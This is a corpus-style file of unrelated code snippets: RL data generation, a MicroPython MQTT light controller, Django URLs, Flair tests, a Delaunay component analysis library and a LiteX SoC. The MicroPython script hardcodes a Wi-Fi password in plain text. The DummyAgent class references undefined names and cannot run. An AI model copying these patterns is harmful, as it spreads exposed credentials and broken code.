shortterm = np.asarray(traj_history[-1])
action_history += [one_hot(5, actions[0]),]
character_history += [run,]
mental_history += [episode,]
predict_history += [shortterm,]
if not env.full_test:
break
obs, _, _, = env.step(actions)
# end of episode
episode = np.zeros((ep_length, *filler.shape))
episode[ep_length-episode_time:] = traj_history[-episode_time:]
episode_history += [episode, ]
episode_number += 1
return character_history, mental_history, predict_history, action_history
def format_data_torch(data, **train_kwargs):
char = np.asarray(data[0]).astype('float32')
# (N, Ep, F, W, H, C) = first.shape
#first.reshape((N, Ep, F, C, H, W))
char = np.swapaxes(char, 3, 5)
mental = np.asarray(data[1]).astype('float32')
# (N, F, W, H, C) = first.shape
#first.reshape((N, F, C, H, W))
mental = np.swapaxes(mental, 2, 4)
query = np.asarray(data[2][:]).astype('float32')
# (N, W, H, C) = second.shape
#second.reshape((N, C, H, W))
query = np.swapaxes(query, 1, 3)
act = np.asarray(data[3][:]).astype('int32')
char1 = torch.Tensor(char).cuda()#[:, 0, :, :, :, :]
mental1 = torch.Tensor(mental).cuda()
query1 = torch.Tensor(query).cuda()#[:, 0, :, :, :]
act1 = torch.Tensor(act).cuda()
dataset = torch.utils.data.TensorDataset(char1, mental1, query1, act1)
return torch.utils.data.DataLoader(dataset, **train_kwargs)
def supervised_training(env, agents, data):
dummies = [Dummy(steps, model) for agent in agents]
class DummyAgent():
'''
railroads the agent for some steps,
then switches to an alternate model.
railroaded steps should be included in
environment's test condition,
returned as the final value of reset()
predefined strategies after the railroaded
steps are compared with the alt model's output
'''
def __init__(self, railroad, strategies, model):
self.n = -1
self.length = len(railroad)
self.model = model
self.rails = railroad
self.strats = strategies
def choose_action(self, obs):
if n <= self.length:
self.n += 1
return self.railroad[self.n], [0 for x in self.strats]
else:
self.n += 1
act = self.model.choose_action(obs)
return act, [act == x[self.n] for x in self.strats]
def reset(railroad, strategies):
self.length = len(railroad)
self.rails = railroad
self.strats = strategies
| StarcoderdataPython |
191516 |
import unittest
import _init_paths
from datasets.pascal_voc import pascal_voc
class MyTestCase(unittest.TestCase):
def test_pascal_voc(self):
d = pascal_voc('trainval', '2007')
res = d.roidb
from IPython import embed
embed()
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
3265157 | from ...plugins.sqliteregistry import SqliteRegistry
def get_sql_registry():
sql_registry = SqliteRegistry()
return lambda: sql_registry
| StarcoderdataPython |
1606048 | import network
import time
import gc
import apa
import pwm
from umqtt.simple import MQTTClient
# Config
wifi_ssid = "HaSi-Kein-Internet-Legacy"
wifi_psk = "bugsbunny"
mqtt_server = "mqtt.hasi"
mqtt_client_name = "ircometer"
mqtt_state_topic = "hasi/lights/ircometer"
mqtt_msg_topic = "hasi/telegram/message"
lights_on = True
mqtt_client = None
wifi = None
activity = 0.0
def play_animation():
apa.color(255, 255, 255, 31)
pwm.amplitude(0.25)
time.sleep(0.1)
apa.color(255, 255, 255, 0)
pwm.amplitude(0.0)
time.sleep(0.1)
apa.color_r(255, 255, 255, 31)
pwm.amplitude(0.5)
time.sleep(0.2)
apa.color(255, 255, 255, 0)
pwm.amplitude(0.0)
time.sleep(0.1)
apa.color_l(255, 255, 255, 31)
pwm.amplitude(1.0)
time.sleep(0.5)
apa.color(255, 255, 255, 0)
pwm.amplitude(0.0)
time.sleep(0.5)
apa.color_r(255, 255, 255, 31)
pwm.amplitude(1.0)
time.sleep(0.2)
apa.color_l(255, 255, 255, 31)
time.sleep(0.1)
apa.color_r(255, 255, 255, 0)
time.sleep(0.2)
apa.color_r(255, 255, 255, 31)
time.sleep(0.2)
for i in range(255):
apa.color(255-i, 255, 255-i, 31)
pwm.amplitude(100/(i+1))
set_amplitude(0.0)
def setup():
print('Setting up...')
global wifi
global wifi_ssid
global wifi_psk
global mqtt_state_topic
global mqtt_msg_topic
global mqtt_server
global mqtt_client
global mqtt_client_name
# Setup Network
wifi = network.WLAN(network.STA_IF)
wifi.active(True)
if not wifi.isconnected():
print('connecting to network...')
wifi.connect(wifi_ssid, wifi_psk)
while not wifi.isconnected():
pass
print('network config:', wifi.ifconfig())
# Setup MQTT
mqtt_client = MQTTClient(mqtt_client_name, mqtt_server)
mqtt_client.set_callback(mqtt_callback)
mqtt_client.connect()
mqtt_client.subscribe(bytes(mqtt_state_topic, "utf-8"))
mqtt_client.subscribe(bytes(mqtt_msg_topic, "utf-8"))
def set_amplitude(p):
p = min(p, 1.0)
if lights_on:
apa.amplitude(p)
pwm.amplitude(p)
else:
apa.color(0, 0, 0, 0)
pwm.amplitude(0.0)
def mqtt_callback(topic, msg):
global lights_on
global activity
message = str(msg, "utf-8")
topic = str(topic, "utf-8")
if topic == mqtt_state_topic:
if message == "on" and not lights_on:
print("mqtt on")
play_animation()
lights_on = True
elif message == "off" and lights_on:
print("mqtt off")
lights_on = False
elif topic == mqtt_msg_topic:
print("received a message")
if activity < 2.0:
activity += 0.1
def loop():
global wifi
global activity
global mqtt_client
while True:
if not wifi.isconnected():
setup()
else:
gc.collect()
mqtt_client.check_msg()
if activity >= 0.0001:
activity -= 0.0001
set_amplitude(activity)
time.sleep(0.1)
play_animation()
setup()
loop()
| StarcoderdataPython |
3346504 | from django.conf.urls import url, patterns
from . import views
urlpatterns = patterns('',
url(r'^$', views.my_contact, name='satchless-contact-my-contact'),
url(r'^address/new/', views.address_edit, name='satchless-contact-address-new'),
url(r'^address/(?P<address_pk>[0-9]+)/edit/',
views.address_edit, name='satchless-contact-address-edit'),
)
| StarcoderdataPython |
107909 | <filename>tests/model/test_flair.py
# -*- coding: utf-8 -*-
import pytest
import os
import torch
import flair
from eznlp.token import TokenSequence
from eznlp.model import FlairConfig
from eznlp.training import count_params
@pytest.mark.parametrize("agg_mode", ['last', 'mean'])
def test_flair_embeddings(agg_mode, flair_lm):
batch_tokenized_text = [["I", "like", "it", "."],
["Do", "you", "love", "me", "?"],
["Sure", "!"],
["Future", "it", "out"]]
flair_emb = flair.embeddings.FlairEmbeddings(flair_lm)
flair_sentences = [flair.data.Sentence(" ".join(sent), use_tokenizer=False) for sent in batch_tokenized_text]
flair_emb.embed(flair_sentences)
expected = torch.nn.utils.rnn.pad_sequence([torch.stack([tok.embedding for tok in sent]) for sent in flair_sentences],
batch_first=True,
padding_value=0.0)
flair_config = FlairConfig(flair_lm=flair_lm, agg_mode=agg_mode)
flair_embedder = flair_config.instantiate()
batch_tokens = [TokenSequence.from_tokenized_text(tokenized_text) for tokenized_text in batch_tokenized_text]
batch_flair_ins = flair_config.batchify([flair_config.exemplify(tokens) for tokens in batch_tokens])
if agg_mode.lower() == 'last':
assert (flair_embedder(**batch_flair_ins) == expected).all().item()
else:
assert (flair_embedder(**batch_flair_ins) != expected).any().item()
@pytest.mark.parametrize("freeze", [True, False])
@pytest.mark.parametrize("use_gamma", [True, False])
def test_trainble_config(freeze, use_gamma, flair_lm):
flair_config = FlairConfig(flair_lm=flair_lm, freeze=freeze, use_gamma=use_gamma)
flair_embedder = flair_config.instantiate()
expected_num_trainable_params = 0
if not freeze:
expected_num_trainable_params += count_params(flair_lm, return_trainable=False)
if use_gamma:
expected_num_trainable_params += 1
assert count_params(flair_embedder) == expected_num_trainable_params
def test_serialization(flair_fw_lm):
config = FlairConfig(flair_lm=flair_fw_lm)
config_path = "cache/flair_embedder.config"
torch.save(config, config_path)
assert os.path.getsize(config_path) < 1024 * 1024 # 1MB
| StarcoderdataPython |
4821708 | from .krokimagic import KrokiMagic
def load_ipython_extension(ipython):
ipython.register_magics(KrokiMagic)
| StarcoderdataPython |
4834873 | <gh_stars>1-10
import gc
import networkx as nx
import numpy as np
import os
import logging
import pickle
from dca.schemes import (
DCALoggers,
DelaunayGraphVisualizer,
REData,
ExperimentDirs,
DelaunayGraphParams,
HDBSCANParams,
GeomCAParams,
QueryData,
)
from dca.delaunay_graph import DelaunayGraph
from typing import Optional, List
import pandas as pd
import dca.delaunay_graph_utils as graph_utils
import dca.visualization as visualization
import logging.config
from dca.loggers import logger_time, get_parameters
import json
# -------------------------------------------------------------------------- #
# Logging settings
# -------------------------------------------------------------------------- #
logger = logging.getLogger("DCA_info_logger")
result_logger = logging.getLogger("DCA_result_logger")
time_logger = logging.getLogger("DCA_time_logger")
# -------------------------------------------------------------------------- #
# -------------------------------------------------------------------------- #
class DCA:
def __init__(
self,
dirs: ExperimentDirs,
Delaunay_graph_params: DelaunayGraphParams,
clustering_params: HDBSCANParams,
GeomCA_params: GeomCAParams,
loggers: DCALoggers,
random_seed: int = 1111,
):
np.random.seed(random_seed)
# Paths
self.root = dirs.experiment_dir
self.precomputed_dir = dirs.precomputed_dir
self.DCA_dir = dirs.DCA_dir
self.visualization_dir = dirs.visualization_dir
self.results_dir = dirs.results_dir
self.logs_dir = dirs.logs_dir
# Initialize the loggers
self.loggers = loggers
logging.config.dictConfig(loggers.loggers)
# Parameters
self.GeomCA_params = GeomCA_params
self.graph_params = Delaunay_graph_params
self.clustering_params = clustering_params
self.save_parameters(
[dirs, Delaunay_graph_params, clustering_params, GeomCA_params],
random_seed,
loggers.version,
)
# Visualisation
self.visualize_Delaunay_graph = False
# -------------------------------------------------------------------------- #
# Prepocess data and save parameters
# -------------------------------------------------------------------------- #
def preprocess_data(self, data: REData):
"""
Prepares the input array for Delaunay approximation.
:param data: R and E data parameters.
:return: DelaunayGraphVisualizer object.
"""
input_array_filepath = os.path.join(self.root, data.input_array_filepath)
if not os.path.isfile(input_array_filepath):
input_array = np.concatenate([data.R, data.E]).astype(np.float32)
np.save(input_array_filepath, input_array)
if data.visualize:
G_visualizer = DelaunayGraphVisualizer(
os.path.join(self.root, data.input_array_filepath),
data.num_R,
data.num_E,
)
logger.debug("DelaunayGraphVisualizer initialized")
return G_visualizer
def preprocess_query_data(self, query_data: QueryData):
"""
Prepares the input array of query points for query point Delaunay approximation.
:param query_data: query data parameters.
"""
query_input_array_filepath = os.path.join(
self.root, query_data.query_input_array_filepath
)
if not os.path.isfile(query_input_array_filepath):
input_array = query_data.Q.astype(np.float32)
np.save(query_input_array_filepath, input_array)
def save_parameters(
self,
params_list: List,
random_seed: int = 1111,
version: int = 0,
):
"""
Saves input parameters.
:param params_list: list of input parameters.
:param random_seed:
:param version: experiment version index.
"""
params_dict = {"random_seed": random_seed}
for params in params_list:
dict = get_parameters(params)
params_dict = {**params_dict, **dict}
with open(
os.path.join(self.logs_dir, f"version{version}_input.json"),
"w",
) as f:
json.dump(params_dict, f, indent=4)
# -------------------------------------------------------------------------- #
# DCA: R and E
# -------------------------------------------------------------------------- #
@logger_time
def fit(self, data: REData):
"""
DCA
Runs DCA algorithm on the given sets of representations R and E.
:param data: R and E data parameters.
:return: DCA local and global evaluation scores.
"""
print("Starting to run DCA...")
# Preprocess input data
G_visualizer = self.preprocess_data(data)
logger.debug("Input data saved")
# Get Delaunay graph
G = self.get_Delaunay_graph(data, G_visualizer)
logger.debug("DelaunayGraph initialized")
print("- Delaunay graph approximated.")
n_points = data.num_R + data.num_E
del data
gc.collect()
# Get Delaunay connected components
(
component_vertex_idx_mapping,
first_non_trivial_component,
) = self.get_Delaunay_connected_components(n_points, G.graph, G_visualizer)
logger.debug("Delaunay connected components obtained")
G.set_first_trivial_component_idx(first_non_trivial_component.item())
logger.debug(
"Delaunay first non trivial component set to: %s",
first_non_trivial_component,
)
print("- Distilled Delaunay graph built.")
# Analyse Delaunay connected components
self.analyse_Delaunay_connected_components(
component_vertex_idx_mapping, G, G_visualizer
)
logger.debug("Delaunay connected components analysed")
print("- Distilled Delaunay graph analysed.")
# Save results
output = self.save_DCA_logs(G)
logger.debug("- DCA results saved.")
# Plot results
visualization._plot_RE_components_consistency(
G,
self.visualization_dir,
min_comp_size=2,
annotate_largest=True,
display_smaller=False,
)
visualization._plot_RE_components_quality(
G,
self.visualization_dir,
min_comp_size=2,
annotate_largest=True,
display_smaller=False,
)
logger.debug("DCA results visualized")
print("- DCA executed, results saved to: {0}.".format(self.DCA_dir))
return output
@logger_time
def get_Delaunay_graph(
self, data: REData, visualizer: Optional[DelaunayGraphVisualizer] = None
):
"""
Phase 1
Approximates and filters Delunay graph on the given sets of representations R and E.
:param data: R and E data parameters.
:param visualizer: DelaunayGraphVisualizer object.
:return: approximated and filtered Delaunay graph.
"""
# Build Delaunay edges if it does not exists
graph_utils._approximate_Delaunay_edges(
self.root, data.input_array_filepath, self.graph_params
)
logger.debug(
"Delaunay graph {0} created with parameter nrays={1}.".format(
os.path.join(self.root, self.graph_params.unfiltered_edges_filepath),
self.graph_params.T,
)
)
# Filter Delaunay edges if specified
if self.graph_params.sphere_coverage == 1.0:
Delaunay_edges = np.load(
os.path.join(self.root, self.graph_params.unfiltered_edges_filepath)
)[:, :2]
Delaunay_edges_len = np.load(
os.path.join(self.root, self.graph_params.unfiltered_edges_len_filepath)
)
logger.debug("Unfiltered Delaunay edges of shape: %s", Delaunay_edges.shape)
else:
logger.debug(
"Chosen sphere coverage: %s", self.graph_params.sphere_coverage
)
unfiltered_Delaunay_edges_shape = graph_utils._filter_Delaunay_edges(
os.path.join(self.root, self.graph_params.unfiltered_edges_filepath),
os.path.join(
self.root, self.graph_params.unfiltered_edges_len_filepath
),
self.graph_params,
os.path.join(self.root, self.graph_params.filtered_edges_filepath),
os.path.join(self.root, self.graph_params.filtered_edges_len_filepath),
data.num_R + data.num_E,
)
Delaunay_edges = np.load(
os.path.join(self.root, self.graph_params.filtered_edges_filepath)
)
Delaunay_edges_len = np.load(
os.path.join(self.root, self.graph_params.filtered_edges_len_filepath)
)
logger.debug(
"Unfiltered Delaunay graph shape: %s", unfiltered_Delaunay_edges_shape
)
logger.debug("Filtered Delaunay graph shape: %s", Delaunay_edges.shape)
logger.debug("Delaunay edges extracted")
# Init DelaunayGraph
G = DelaunayGraph(data.num_R, data.num_E)
G.init_Delaunay_graph(Delaunay_edges, Delaunay_edges_len)
if visualizer is not None:
visualization._plot_Delaunay_graph(
visualizer,
edges=Delaunay_edges,
filename="approximated_Delaunay_graph",
root=self.visualization_dir,
)
logger.debug("Delaunay edges visualized")
return G
@logger_time
def get_Delaunay_connected_components(
self,
n_points: int,
graph: nx.Graph,
visualizer: Optional[DelaunayGraphVisualizer] = None,
):
"""
Phase 2
Distilles the approximated Delunay graph into connected components.
:param n_points: total number of points in R and E.
:param graph: approximated Delaunay graph.
:param visualizer: DelaunayGraphVisualizer object.
:return: dict with keys representing component indices and arrays of
corresponding vertices containined in each component as values;
index of the first non trivial component.
"""
# Perform HDBSCAN clustering
input_array_labels = graph_utils._distil_Delaunay_connected_components(
self.root, self.clustering_params, graph
)
logger.debug("HDBSCAN executed")
logger.debug(
"Number of significant connected components: %s",
len(np.unique(input_array_labels)),
)
if visualizer is not None:
xlim, ylim = visualization._plot_Delaunay_graph(
visualizer,
graph.edges,
filename="Delaunay_components",
root=self.visualization_dir,
labels=input_array_labels,
)
logger.debug("Delaunay connected components visualized")
visualizer.xlim = xlim
visualizer.ylim = ylim
logger.debug(f"DelaunayGraphVisualizer updated xlim={xlim} and ylim={ylim}")
# Extract components sorted by their vertex size
(
component_vertex_idx_mapping,
first_non_trivial_component,
) = graph_utils._sort_Delaunay_connected_components(
self.root,
input_array_labels,
self.clustering_params,
n_points,
)
logger.debug("Delaunay connected components extracted")
gc.collect()
return (component_vertex_idx_mapping, first_non_trivial_component)
@logger_time
def analyse_Delaunay_connected_components(
self,
component_vertex_idx_mapping: dict,
G: DelaunayGraph,
visualizer: Optional[DelaunayGraphVisualizer] = None,
discard_component_graph: Optional[bool] = True,
):
"""
Phase 3
Analyses the connected components of the distilled Delunay graph.
:param component_vertex_idx_mapping: dictionary of vertex indices contained in each component.
:param G: distilled Delaunay graph.
:param visualizer: DelaunayGraphVisualizer object.
:param discard_component_graph: whether to discard the component nx.Graph object (storage heavy).
"""
for comp_idx, comp_vertices in component_vertex_idx_mapping.items():
subgraph_RE_comp = G.graph.subgraph(comp_vertices)
if nx.is_empty(subgraph_RE_comp):
subgraph_RE_comp = nx.Graph()
subgraph_RE_comp.add_nodes_from(comp_vertices)
if visualizer is not None and comp_idx < G.first_trivial_component_idx:
visualization._plot_Delaunay_graph(
visualizer,
edges=subgraph_RE_comp.edges,
filename=f"component_{comp_idx}_Delaunay",
root=self.visualization_dir,
vertices=np.array(comp_vertices),
keep_range=True,
)
logger.debug(f"Delaunay connected component {comp_idx} visualized")
subgraph_R_comp, subgraph_E_comp = graph_utils._extract_RE_subgraphs(
subgraph_RE_comp, G.num_R, G.num_E
)
(
comp_R_idxs,
comp_E_idxs,
comp_consistency,
comp_quality,
num_comp_RE_edges,
num_total_comp_edges,
) = graph_utils._evaluate_Delaunay_component(
subgraph_RE_comp, subgraph_R_comp, subgraph_E_comp, G.num_R
)
logger.debug(f"Delaunay connected component {comp_idx} analyzed")
G.update_local_stats(
comp_R_idxs,
comp_E_idxs,
comp_consistency,
comp_quality,
num_comp_RE_edges,
num_total_comp_edges,
self.GeomCA_params.comp_consistency_threshold,
self.GeomCA_params.comp_quality_threshold,
None if not discard_component_graph else subgraph_RE_comp,
)
logger.debug(f"DelaunayGraph updated local stats with component {comp_idx}")
if visualizer is not None:
visualization._plot_isolated_components(
G, visualizer, self.visualization_dir
)
logger.debug("Isolated Delaunay connected components")
visualization._plot_Delaunay_graph(
visualizer,
edges=G.distil_edges(),
filename="distilled_Delaunay_graph",
root=self.visualization_dir,
)
logger.debug("distilled Delaunay edges visualized")
G.update_global_stats()
logger.debug(f"DelaunayGraph updated global stats")
def save_DCA_logs(self, G: DelaunayGraph):
"""
Saves DCA scores to files.
:param G: distilled Delaunay graph with local and global evaluation scores.
"""
path = os.path.join(self.results_dir, "network_stats.pkl")
with open(path, "wb") as f:
pickle.dump(G.network_stats, f)
logger.debug(f"DelaunayGraph network_stats saved")
path = os.path.join(self.results_dir, "components_stats.pkl")
with open(path, "wb") as f:
pickle.dump(G.comp_stats, f)
logger.debug(f"DelaunayGraph components_stats saved")
output = G.save_stats()
with open(os.path.join(self.DCA_dir, "output.json"), "w") as fp:
json.dump(output, fp, indent=4)
def cleanup(self, remove_visualizations: bool = True, remove_logs: bool = True):
"""
Removes the DCA files in the experiment folder. Default removes all files except for the output scores.
:param remove_visualizations: whether to remove the visualizations.
:param remove_logs: whether to remove the logging files.
"""
# Remove precomputed folder
os.system(f"rm -r {self.precomputed_dir}")
# Remove DCA dir
os.system((f"rm -r {self.results_dir}"))
# Remove logs
if remove_logs:
os.system(f"rm -r {self.logs_dir}")
else: # Remove all non-log files, eg npy from qDCA
for file in os.listdir(str(self.logs_dir)):
if not file.endswith(".logs"):
os.system(f"rm {file}")
# Remove logs
if remove_visualizations:
os.system(f"rm -r {self.visualization_dir}")
print("- Cleanup completed.")
# -------------------------------------------------------------------------- #
# qDCA: query point processing
# -------------------------------------------------------------------------- #
@logger_time
def process_query_points(
self,
init_data: REData,
query_data: QueryData,
assign_to_comp: bool = False,
consider_several_assignments: bool = False,
assign_to_R: bool = False,
assign_to_RE: bool = False,
return_len: bool = False,
):
"""
query point Delaunay Component Analysis (q-DCA).
:param init_data: R and E data parameters.
:param query_data: query data parameters.
:param assign_to_comp: whether to assign query points to fundamental components.
:param consider_several_assignments: whether to consider fliexible assignment.
:param assign_to_R: whether to assign query points to R points only.
:param assign_to_RE: whether to assign query points to R and E points.
:param return_len: whether to return the length of the shortest edges.
:return: dataframe of query point indices and the associated assignments.
"""
self.loggers.qdca_flag = True
G = DelaunayGraph(init_data.num_R, init_data.num_E)
G.load_existing(self.results_dir)
logger.debug("Loaded existing DelaunayGraph")
self.preprocess_query_data(query_data)
if assign_to_comp:
(
query_points_comp_labels,
considered_comp_idx_list,
) = self.assign_query_points_to_components(
init_data,
query_data,
G,
consider_several_assignments=consider_several_assignments,
)
logger.debug("Query points assigned to connected components")
print(
"- qDCA assignment to components executed, results saved to: {0}.".format(
self.results_dir
)
)
return query_points_comp_labels, considered_comp_idx_list
elif assign_to_RE:
query_points_nclosest_init_point_idxs = (
self.assign_query_points_to_closest_init_point(
init_data, query_data, return_len=return_len
)
)
logger.debug("Query points assigned to closest RE point")
print(
"- qDCA assignment to closest RE executed, results saved to: {0}.".format(
self.results_dir
)
)
return query_points_nclosest_init_point_idxs
elif assign_to_R:
query_points_nclosest_init_point_idxs = (
self.assign_query_points_to_closest_init_point(
init_data, query_data, assign_to_R=True
)
)
logger.debug("Query points assigned to closest R point")
print(
"- qDCA assignment to closest R executed, results saved to: {0}.".format(
self.results_dir
)
)
return query_points_nclosest_init_point_idxs
else:
raise ValueError(
"Query pont processing format not specified, choose one option."
)
@logger_time
def assign_query_points_to_components(
self,
init_data: REData,
query_data: QueryData,
G: DelaunayGraph,
consider_several_assignments: bool = False,
):
"""
Assigns query points to fundamental components.
:param init_data: R and E data parameters.
:param query_data: query data parameters.
:param G: existing distilled Delaunay graph.
:param consider_several_assignments: whether to consider fliexible assignment.
:return: dataframe of query point indices and the associated assignments;
indices of fundamental components.
"""
# Compute average edge length of each component
comp_distances_df, considered_comp_idx_list = G.get_component_edge_len(
self.GeomCA_params.comp_consistency_threshold,
self.GeomCA_params.comp_quality_threshold,
)
self.save_DCA_logs(G)
logger.debug("Average edge length per (non-trivial) component extracted")
print("- Delaunay edges to query points obtained.")
# Remove query edges connecting to outliers defined by HDBSCAN
query_edges_df = self.get_query_Delaunay_edges_stats(init_data, query_data)
query_edges_to_components_df = query_edges_df[
query_edges_df["label"] < G.first_trivial_component_idx
]
logger.debug("Average edge length per (non-trivial) component extracted")
# For each query point and component it is connected to:
# get the shortest edge length to each component and number of edges connecting
# to that component
df = (
query_edges_to_components_df.groupby(["query_idx", "label"])[["len"]]
.agg(["min", "count"])
.reset_index()
)
df.columns = df.columns.droplevel(0)
df.reset_index()
df.columns = ["query_idx", "label", "len", "init_idx_count"]
# Merge with the range of component edges from the distilled Delaunay graph
df = df.join(comp_distances_df, on="label")
# Extract query points whose shortest edges fall within the edge length range
# of the corresponding component
df_component_assignment = df[df.len <= df.mean_plus_std]
num_comp_assignments = (
df_component_assignment.groupby(["query_idx"])["label"]
.count()
.to_frame()
.rename(columns={"label": "num_comp_assignments"})
)
df_component_assignment = df_component_assignment.join(
num_comp_assignments, on="query_idx"
)
# Conservative assignment:
# Extract only those points that belong to one component
num_Q = query_data.num_Q
query_points_comp_assignment = (
df_component_assignment[df_component_assignment.num_comp_assignments == 1][
["query_idx", "label"]
]
.to_numpy()
.astype(int)
)
# Flexible assignment:
# Extract those points that are assigned to more components
if consider_several_assignments:
two_assignments = df_component_assignment[
df_component_assignment.num_comp_assignments >= 2
]
two_assignments_sorted_by_len = two_assignments.sort_values(
by=["query_idx", "len"]
)
extra_assignments_by_len = two_assignments_sorted_by_len.drop_duplicates(
subset=["query_idx"], keep="first"
)
two_assignments_sorted_by_num_edges = two_assignments.sort_values(
by=["query_idx", "init_idx_count"]
)
extra_assignments_by_num_edges = (
two_assignments_sorted_by_num_edges.drop_duplicates(
subset=["query_idx"], keep="last"
)
)
extras = pd.merge(
extra_assignments_by_len,
extra_assignments_by_num_edges,
how="inner",
on=list(extra_assignments_by_num_edges),
)
assert (
np.intersect1d(
extras["query_idx"], query_points_comp_assignment[:, 0]
).size
== 0
)
extra_labels = extras[["query_idx", "label"]].astype(int).to_numpy()
query_points_comp_assignment = np.concatenate(
[query_points_comp_assignment, extra_labels]
)
query_points_comp_assignment[:, 0] -= init_data.num_R + init_data.num_E
not_assigned_idx = np.setdiff1d(
np.arange(num_Q), query_points_comp_assignment[:, 0]
)
not_assigned = np.array(
[not_assigned_idx, np.repeat(-1, len(not_assigned_idx))]
).T
query_points_comp_labels = np.concatenate(
[query_points_comp_assignment, not_assigned]
)
query_points_comp_labels = query_points_comp_labels[
np.argsort(query_points_comp_labels[:, 0])
]
# Save the assignment results
np.save(
os.path.join(
self.results_dir, query_data.query_input_array_comp_assignment_filename
),
query_points_comp_labels,
)
np.save(
os.path.join(
self.results_dir,
query_data.query_input_array_considered_comp_list_filename,
),
np.array(considered_comp_idx_list),
)
return query_points_comp_labels, considered_comp_idx_list
@logger_time
def assign_query_points_to_closest_init_point(
self,
init_data: REData,
query_data: QueryData,
n_closest: int = 1,
assign_to_R: bool = False,
return_len: bool = False,
):
"""
Assigns query points to closest R (and E) point.
:param init_data: R and E data parameters.
:param query_data: query data parameters.
:param n_closest: number of closest neighbours to consider.
:param assign_to_R: whether to assign query points to R points only.
:param return_len: whether to return the length of the shortest edges.
:return: dataframe of query point indices and the associated assignments.
"""
query_edges_df = self.get_query_Delaunay_edges_stats(init_data, query_data)
query_edges_df.query_idx -= init_data.num_R + init_data.num_E
# Whether to consider edges to E points or not
if assign_to_R:
query_edges_df = query_edges_df[query_edges_df.init_idx < init_data.num_R]
if n_closest > 1:
nclosest_init_point_list = []
for query_idx in query_edges_df.query_idx.unique():
nclosest_init_idxs = (
query_edges_df[query_edges_df.query_idx == query_idx]
.nsmallest(n_closest, "len")["init_idx"]
.to_numpy()
.astype(int)
)
nclosest_init_idxs = np.insert(nclosest_init_idxs, 0, int(query_idx))
# Pad if not enough neighbours
nclosest_init_idxs = np.pad(
nclosest_init_idxs,
(0, max(n_closest + 1 - len(nclosest_init_idxs), 0)),
mode="constant",
constant_values=-1,
)
nclosest_init_point_list.append(nclosest_init_idxs)
query_points_nclosest_init_point_idxs = np.stack(nclosest_init_point_list)
np.save(
os.path.join(
self.results_dir,
query_data.query_input_array_point_assignment_filename,
),
query_points_nclosest_init_point_idxs,
)
return query_points_nclosest_init_point_idxs
else:
# Find closest
df = query_edges_df.loc[
query_edges_df.groupby(["query_idx"])["len"].idxmin()
]
if return_len:
query_points_closest_init_point_idxs = (
df[["query_idx", "init_idx", "len"]].to_numpy().astype(float)
)
else:
query_points_closest_init_point_idxs = (
df[["query_idx", "init_idx"]].to_numpy().astype(int)
)
np.save(
os.path.join(
self.results_dir,
query_data.query_input_array_point_assignment_filename,
),
query_points_closest_init_point_idxs,
)
return query_points_closest_init_point_idxs
@logger_time
def get_query_Delaunay_edges_stats(self, init_data: REData, query_data: QueryData):
"""
Extracts graph neighbourhood of each query point.
:param init_data: R and E data parameters.
:param query_data: query data parameters.
:return: dataframe of query point indices and the associated neughbourhood.
"""
Delaunay_edges_stats_filepath = os.path.join(
self.logs_dir, query_data.query_input_array_edges_stats_filename
)
try:
query_edges_df = pd.read_pickle(Delaunay_edges_stats_filepath)
except:
# Extract query Delaunay edges
graph_utils._approximate_query_Delaunay_edges(
self.logs_dir,
os.path.join(self.root, init_data.input_array_filepath),
os.path.join(self.root, query_data.query_input_array_filepath),
self.graph_params,
)
logger.debug("Unfiltered query Delaunay edges extracted")
# Filter query edges as in the initial approximated Delaunay graph
if self.graph_params.sphere_coverage == 1.0:
query_Delaunay_edges = np.load(
os.path.join(
self.logs_dir, self.graph_params.query_unfiltered_edges_filename
)
)[:, :2]
query_Delaunay_edges_len = np.load(
os.path.join(
self.logs_dir,
self.graph_params.query_unfiltered_edges_len_filename,
)
)
else:
graph_utils._filter_Delaunay_edges(
os.path.join(
self.logs_dir, self.graph_params.query_unfiltered_edges_filename
),
os.path.join(
self.logs_dir,
self.graph_params.query_unfiltered_edges_len_filename,
),
self.graph_params,
os.path.join(
self.logs_dir, self.graph_params.query_filtered_edges_filename
),
os.path.join(
self.logs_dir,
self.graph_params.query_filtered_edges_len_filename,
),
n_points=init_data.num_R + init_data.num_E,
n_query_points=query_data.num_Q,
)
query_Delaunay_edges = np.load(
os.path.join(
self.logs_dir, self.graph_params.query_filtered_edges_filename
)
)
query_Delaunay_edges_len = np.load(
os.path.join(
self.logs_dir,
self.graph_params.query_filtered_edges_len_filename,
)
)
logger.debug("query Delaunay edges extracted")
# Get component idx (label) that each query edge connects to and its length
input_array_comp_labels = np.load(
os.path.join(
self.root, self.clustering_params.input_array_labels_filepath
)
)
query_edges_array = np.stack(
[
query_Delaunay_edges[:, 0],
query_Delaunay_edges[:, 1],
input_array_comp_labels[query_Delaunay_edges[:, 1]],
query_Delaunay_edges_len.squeeze(),
],
axis=1,
).astype(np.float32)
query_edges_df = pd.DataFrame(
data=query_edges_array,
columns=["query_idx", "init_idx", "label", "len"],
).astype(float)
query_edges_df.to_pickle(
os.path.join(
self.logs_dir, query_data.query_input_array_edges_stats_filename
)
)
return query_edges_df
| StarcoderdataPython |
1797927 | import pybullet as p
class Obstacle(object):
def __init__(self, urdf_file, position, scale=1.0) -> None:
self.body_id = p.loadURDF(urdf_file, position, globalScaling=scale)
def __del__(self):
p.removeBody(self.body_id)
@staticmethod
def load_obstacle(obstacle):
return Obstacle(obstacle['urdf_file'], obstacle['position'], obstacle['scale'])
@staticmethod
def load_obstacles(obstacles):
return list(Obstacle.load_obstacle(obstacle) for obstacle in obstacles)
| StarcoderdataPython |
1729432 | <reponame>daveshah1/linux-on-litex-vexriscv
#!/usr/bin/env python3
import argparse
from migen import *
from litex.boards.targets import arty
from litex.soc.interconnect import wishbone
from litex.soc.integration.soc_core import mem_decoder
from litex.soc.integration.builder import Builder
from litex.soc.cores.spi_flash import SpiFlash
# LinuxSoC -----------------------------------------------------------------------------------------
class LinuxSoC(arty.EthernetSoC):
csr_map = {
"ddrphy": 16,
"cpu": 17,
"ethphy": 18,
"ethmac": 19
}
csr_map.update(arty.EthernetSoC.csr_map)
arty.EthernetSoC.mem_map = {
"rom": 0x00000000,
"sram": 0x10000000,
"emulator_ram": 0x20000000,
"ethmac": 0x30000000,
"spiflash": 0x50000000,
"main_ram": 0xc0000000,
"csr": 0xf0000000,
}
def __init__(self):
arty.EthernetSoC.__init__(self, cpu_type="vexriscv", cpu_variant="linux")
self.cpu.use_external_variant("VexRiscv.v")
self.add_constant("NETBOOT_LINUX_VEXRISCV", None)
# machine mode emulator ram
self.submodules.emulator_ram = wishbone.SRAM(0x4000)
